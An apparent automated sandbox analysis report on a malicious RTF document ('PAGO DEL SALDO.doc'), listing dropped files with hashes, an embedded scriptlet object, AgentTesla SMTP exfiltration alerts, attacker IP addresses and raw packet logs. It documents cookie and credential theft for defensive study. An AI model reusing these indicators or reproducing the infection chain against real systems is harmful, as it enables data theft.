SSDEEP:	3:bDuMJlt+A+rXCmX1uih+rXCv:bCm+drX0i8rXs
MD5:	D5282C6D9AB64FE90D11B66486B8CE47
SHA1:	8CECDE758E0C31861FB1ADE725D2FB28F9900385
SHA-256:	FFA65D7871728B70C7EB183FB39BBEDE6EEFA7502FFEBA838276596DA8D429D3
SHA-512:	082476690242A0145A0B81FD3EFF16126ABB09F0B02FDFFBAADB29670497E7D3C82232810FD5DD657CE6943738E7ADA77CFE3D909BA26C2D9AEBD6DB63468994
Malicious:	false
Preview:	[folders]..Templates.LNK=0..PAGO DEL SALDO.LNK=0..[doc]..PAGO DEL SALDO.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VT7C41M2L4V6JEPSUND.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.576040061620306
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5:	2D161BF98AA34087775C31AF6C147256
SHA1:	749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256:	7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512:	E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35BY7DRSER1V8J9JMCO9.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.576040061620306
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5:	2D161BF98AA34087775C31AF6C147256
SHA1:	749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256:	7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512:	E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.576040061620306
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5:	2D161BF98AA34087775C31AF6C147256
SHA1:	749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256:	7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512:	E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.576040061620306
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5:	2D161BF98AA34087775C31AF6C147256
SHA1:	749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256:	7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512:	E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS0OLG9QFDF935YIQMNF.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.576040061620306
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5:	2D161BF98AA34087775C31AF6C147256
SHA1:	749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256:	7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512:	E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X87RSB2KVTP8BHZRK5J6.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.577982850348611
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
MD5:	CC5B6CD494E7B4C933950965B9E74783
SHA1:	693DBBE7323DA069AC852AC2E888D8D11EA55D39
SHA-256:	42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
SHA-512:	BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy) Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.577982850348611
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
MD5:	CC5B6CD494E7B4C933950965B9E74783
SHA1:	693DBBE7323DA069AC852AC2E888D8D11EA55D39
SHA-256:	42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
SHA-512:	BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\SzfukVRF.exe Download File
Process:	C:\Users\user\AppData\Roaming\task.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	504832
Entropy (8bit):	7.875034070984988
Encrypted:	false
SSDEEP:	12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
MD5:	F65B0793251364C03D06E8E7134FC21B
SHA1:	7BC80E89BBC7C10B974462E748849F9056D20D4A
SHA-256:	A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
SHA-512:	BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
Malicious:	true
Joe Sandbox View:	Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................\|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Chrome\Default\Cookies Download File
Process:	C:\Users\user\AppData\Roaming\task.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9650411582864293
Encrypted:	false
SSDEEP:	48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5:	903C35B27A5774A639A90D5332EEF8E0
SHA1:	5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256:	1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512:	076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Firefox\Profiles\7xwghk55.default\cookies.sqlite Download File
Process:	C:\Users\user\AppData\Roaming\task.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08107860342777487
Encrypted:	false
SSDEEP:	48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5:	1138F6578C48F43C5597EE203AFF5B27
SHA1:	9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256:	EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512:	6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious:	false
Preview:	SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\task.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	504832
Entropy (8bit):	7.875034070984988
Encrypted:	false
SSDEEP:	12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
MD5:	F65B0793251364C03D06E8E7134FC21B
SHA1:	7BC80E89BBC7C10B974462E748849F9056D20D4A
SHA-256:	A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
SHA-512:	BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
Malicious:	true
Joe Sandbox View:	Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................\|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\Desktop\~$GO DEL SALDO.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.6064242155052617
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PAGO DEL SALDO.doc
File size:	393199
MD5:	1956fa2feaef4b6fcf3e63f51aa26722
SHA1:	b35003f1c1a874468dbe41370cea443aafb10915
SHA256:	1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
SHA512:	d505806bb9c801efc62561f946bc3921b5748eb7773daa024053e571b068ac4c048f4d0bb0fb95f45ba9e378edbad75529135ba1b71865bc84a56e4a498ddc20
SSDEEP:	1536:ihpDDDDDDDDhtNjWmg5S/CyoMz+rRxyQJNb87hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDDrqYdzFtr5RDAw5wff
File Content Preview:	{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000007DAh	2	embedded	package	97612	abdtfhgXgeghDp.ScT	C:\nsdsTggH\abdtfhgXGeghDp.ScT	C:\CbkepaDw\abdtfhghgeghDp.ScT	no
1	000321E3h	2	embedded	OLE2LInk	2560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-18:22:17.725078	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49169	587	192.168.2.22	208.91.198.143
11/25/21-18:22:27.655558	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49170	587	192.168.2.22	208.91.198.143
11/25/21-18:22:40.216431	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49171	587	192.168.2.22	208.91.198.143
11/25/21-18:23:08.295905	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49172	587	192.168.2.22	208.91.198.143
11/25/21-18:23:17.632468	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49173	587	192.168.2.22	208.91.199.224
11/25/21-18:23:23.304316	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49175	587	192.168.2.22	208.91.198.143

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:21:19.612586975 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:19.759325981 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:19.759510040 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:19.760103941 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:19.907119036 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:19.907155037 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:19.907169104 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:19.907201052 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:19.907308102 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:19.907555103 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.053627968 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053677082 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053702116 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053728104 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053884983 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.053899050 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053935051 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053958893 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.053961992 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053971052 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.053987026 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.053994894 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.054013014 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.200695992 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.200742960 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.200786114 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.200938940 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.200990915 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.201064110 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203048944 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203085899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203131914 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203177929 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203200102 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203227997 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203268051 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203460932 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203516006 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203577995 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203618050 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203691006 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203752041 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.203766108 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.203807116 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.204070091 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.204117060 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.204621077 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.204688072 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.204765081 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.204803944 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.204915047 CET	80	49167	173.232.204.89	192.168.2.22
